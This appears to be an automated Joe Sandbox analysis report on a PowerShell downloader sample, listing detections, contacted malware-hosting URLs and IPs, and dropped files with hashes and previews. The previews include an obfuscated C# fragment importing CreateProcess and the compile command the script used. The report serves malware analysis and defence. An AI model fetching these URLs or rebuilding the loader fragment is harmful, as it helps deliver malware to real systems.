    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ps1006.ps163%ReversingLabsScript-PowerShell.Downloader.Donoff
    ps1006.ps1100%AviraTR/PowerShell.Gen

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://bemnyc.com0%Avira URL Cloudsafe
    https://status.squarespace.com0%Avira URL Cloudsafe
    http://fenett2018.com100%Avira URL Cloudmalware
    http://eastend.jp100%Avira URL Cloudmalware
    http://www.microsoft.cy0%Avira URL Cloudsafe
    http://eastend.jp/bl5kfa100%Avira URL Cloudmalware
    http://yourmother4cancer.info100%Avira URL Cloudmalware
    http://bemnyc.com/u8erijeq100%Avira URL Cloudmalware
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23100%Avira URL Cloudmalware
    http://habarimoto24.com0%Avira URL Cloudsafe
    http://fenett2018.com/dobgx100%Avira URL Cloudmalware
    http://abakus-biuro.net0%Avira URL Cloudsafe
    http://habarimoto24.com/nh0%Avira URL Cloudsafe
    http://abakus-biuro.net//a9zqemm100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    eastend.jp
    		162.43.104.133
    		truefalse
      		unknown
      bemnyc.com
      		198.185.159.145
      		truefalse
        		unknown
        fenett2018.com
        		unknown
        		unknownfalse
          		unknown
          yourmother4cancer.info
          		unknown
          		unknownfalse
            		unknown
            habarimoto24.com
            		unknown
            		unknownfalse
              		unknown
              abakus-biuro.net
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://bemnyc.com/u8erijeqfalse
                • Avira URL Cloud: malware
                		unknown
                http://eastend.jp/bl5kfafalse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.microsoft.cypowershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://yourmother4cancer.infopowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29DC69000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://status.squarespace.compowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000000.00000002.2665414648.000001B29D8EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29D8C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://bemnyc.compowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.microsoft.powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://eastend.jppowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://go.microspowershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/winsvr-202powershell.exe, 00000000.00000002.2805114270.000001B2B4410000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://fenett2018.compowershell.exe, 00000000.00000002.2665414648.000001B29C5CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://habarimoto24.compowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://fenett2018.com/dobgxpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1false
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://habarimoto24.com/nhpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://abakus-biuro.net//a9zqemmpowershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://abakus-biuro.netpowershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    198.185.159.145
                                                    		bemnyc.comUnited States
                                                    		53831SQUARESPACEUSfalse
                                                    162.43.104.133
                                                    		eastend.jpUnited States
                                                    		11333CYBERTRAILSUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1560748
                                                    Start date and time:2024-11-22 09:21:05 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 0s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:ps1006.ps1
                                                    Detection:MAL
                                                    Classification:mal96.expl.evad.winPS1@7/14@6/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 5
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .ps1

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: ps1006.ps1

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    03:22:01API Interceptor33027x Sleep call for process: powershell.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    198.185.159.145ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • bemnyc.com/u8erijeq
                                                    Purchase Order #5315262WNH72901-The Sanford Company.pdfGet hashmaliciousUnknownBrowse
                                                    • aircormech.com/
                                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.145/
                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.145/
                                                    eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                    • uwemusic.com/
                                                    FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                                    • familycompany.net/index.php
                                                    FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                                    • familycompany.net/index.php
                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                    • www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
                                                    BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                    • resolvedcx.com/PhpMyAdmin/
                                                    MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                    • mwpmedia.com/admin/
                                                    162.43.104.133ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • eastend.jp/bl5kfa

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    eastend.jpps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    bemnyc.comps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    pdf.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CYBERTRAILSUSps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    IWnUKXop2x.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 162.43.182.68
                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 162.43.62.102
                                                    25XrVZw56S.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    4wwi2Lh5W4.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    Botulismus56.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 162.43.104.164
                                                    SQUARESPACEUSps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    https://link.edgepilot.com/s/62feea16/mgkISLmjmE63UVzPYgooJQ?u=https://ameely.com.eg/Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    https://sawfish-groundhog-d6h6.squarespace.com/Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    original.emlGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.144
                                                    https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    http://heptagon-olive-l8hr.squarespace.comGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 142.202.19.72
                                                    https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                    • 198.185.159.144

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):61147
                                                    Entropy (8bit):5.077943793919534
                                                    Encrypted:false
                                                    SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                    MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                    SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                    SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                    SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul7got/Z:NllUkot
                                                    MD5:71995B6B43EA2A2D49079E9E99E8D184
                                                    SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                                    SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                                    SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........

                                                    C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.0.cs

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1032), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):1035
                                                    Entropy (8bit):4.369231230362479
                                                    Encrypted:false
                                                    SSDEEP:24:JVPHMxi73UnaDa+anvOq89NWEMF90A7Q/:JVPHMxi73fa++1UNWEpf
                                                    MD5:5989018A4C0AD9CC8BC4CC1E5524186C
                                                    SHA1:EC9217244192C5EC96B4AC67982AC05983036569
                                                    SHA-256:F2C563322C4D6A4C8B00946B48E3A59B45D8EC5991D977ACD4514960F8FAB4E5
                                                    SHA-512:2550FB415B2022E3E3D14BE551310C7C6821D8B1AF7854253D8701F5376D720E1F661C0177F24B0F3BFEDF90469064C107D72B1DCAC6EFA355C24DC6AA786975
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111;public IntPtr ll11llII111;public uint II11IIIIIIl;public uint Il1lI1;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II;public string I11l1111I;public string lllIIlII;public string l1I1IIllI1I1;public uint I1I1ll11I;public uint lIlII11;public uint II11lIIl11I;public uint lIl1lIl1II11;public uint lIIl1Il;public uint Illl11I1;public uint II1ll1l11;public uint IlIlIl1Illl;public short l11111lI1l;public short lllIllI11I11;public IntPtr I1II1lIII;public IntPtr Il11lI1;public IntPtr ll1IlI;public IntPtr l1l11Il1lll1;};public static class lIlIlI{[DllImport("kernel32.dll",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll

                                                    C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.252407323346915
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fRQZzxs7+AEszIwkn23fRQE:p37Lvkmb6KRf6ZWZEif6E
                                                    MD5:3F83A7AABB6CC9FFC5D670DB7ED0CD53
                                                    SHA1:6E510D7CD6B2CB3F498EFAE9A495344A6C7F44B3
                                                    SHA-256:7700644B2351DD3F74F8E9F87C2931A30E4D64A56E8BB600B6412495F19F0D78
                                                    SHA-512:1CCC39D854F771630913CF8FB4DF2B483BF20B40EB4CE272B228CF75A75E1DA7FB9D3752DCD3CB16562B9492EABE38B9A19C87DA092007B658C379170DCCD0AE
                                                    Malicious:true
                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.0.cs"

                                                    C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):2.997319960845197
                                                    Encrypted:false
                                                    SSDEEP:48:6Y+xOMHQ+7mlodYww4IGjKsxg5D5P2oU7WhjJ23r3W1ul9a3Bq:4fQ+7mlyYww47KCKooIcWPK
                                                    MD5:AB48DC113DE983AFF05124F27D80DAB9
                                                    SHA1:861BE15727579241A2CC192264DB5445A5A0778C
                                                    SHA-256:19188374DC60C7029A942FC4D41D83A935AE90D996F7DE6FF0486C9A53F18EF6
                                                    SHA-512:5E69D04C86B6CCD13A137A3C7942C688465B45F972CAD484729066EFEE9A44D3C05A05ECC7907FA257AD866117454883870D91CBF7C03C4F270FB38873EAA4C9
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q@g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..\...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......d...#Blob...........W.........%3................................................................=.6...G.6...............".....I....._.....j.................................................&...........N.....Y.....e.....q.....x.......................................................................................

                                                    C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.out

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):869
                                                    Entropy (8bit):5.338525169085235
                                                    Encrypted:false
                                                    SSDEEP:24:KJBId3ka6KRf6+Eif6RKax5DqBVKVrdFAMBJTH:Ckka6C3Eu6K2DcVKdBJj
                                                    MD5:69FBDF20B9E7A76F7AD98E9AD29FECCC
                                                    SHA1:1FC64161108D7D3887759011E4620BC8E9E223FF
                                                    SHA-256:BB9B947F562229A3246CFCC4511C0904AB22EEABBCA68B5E4F842E96E1794C76
                                                    SHA-512:0B24E45377AD8F86F6DBD08BB4A19DE12BAE7F9CF255B2167FD4E9C1F25A77B3352B6F970BB89ABC8034CD573DA998F8ECA3BA5B80BBF40A977EA5F86E6DC492
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                    C:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.1056694004925953
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqrPN5Dlq5J:+RI+ycuZhN9akSrPNnqX
                                                    MD5:84109075BBBC162669B97FC5DBE70C25
                                                    SHA1:E90EDDDEAB52040292EF37691E1BD5D8F29EB25F
                                                    SHA-256:54D6AFD10713678540F3309730E6F9B7EAFF0887C9053A2758CB91375071183B
                                                    SHA-512:A75259D2453E74851BFD112DAFE352A5939698F9E80FD80A71ABB581E2BAF56CA028666F2E111C20A22DFA7C8C4214D73CCAB651F7AFA75D875B6B1E82ED800E
                                                    Malicious:false
                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                    C:\Users\user\AppData\Local\Temp\RES53EF.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 22 09:41:25 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1332
                                                    Entropy (8bit):4.005637964645039
                                                    Encrypted:false
                                                    SSDEEP:24:HzFzW91+fCjZDfHKwKEsmNwI+ycuZhN9akSrPNnqS2d:DCjdBKhmm1ul9a3BqSG
                                                    MD5:E0DEBA5D8A37E87E9C90020907DF1A88
                                                    SHA1:42CE37C4C7F8C71B78090E51480FBA4E9ECDAFDD
                                                    SHA-256:7E3BE1D25CDDCDA51A3D414A6EA83403B0470892F32C1C98D01D9F96C8B41AFE
                                                    SHA-512:349D2A9AE9624C8054D910360E884EE7142B932E1F1CBB26E130E63DD8861028B76402D9D00C7DD855D112B4499DD422750850BAF1675187F024F1111A7239BB
                                                    Malicious:false
                                                    Preview:L....Q@g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP..................u...&i......%..........4.......C:\Users\user\AppData\Local\Temp\RES53EF.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axeaeocl.fxu.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
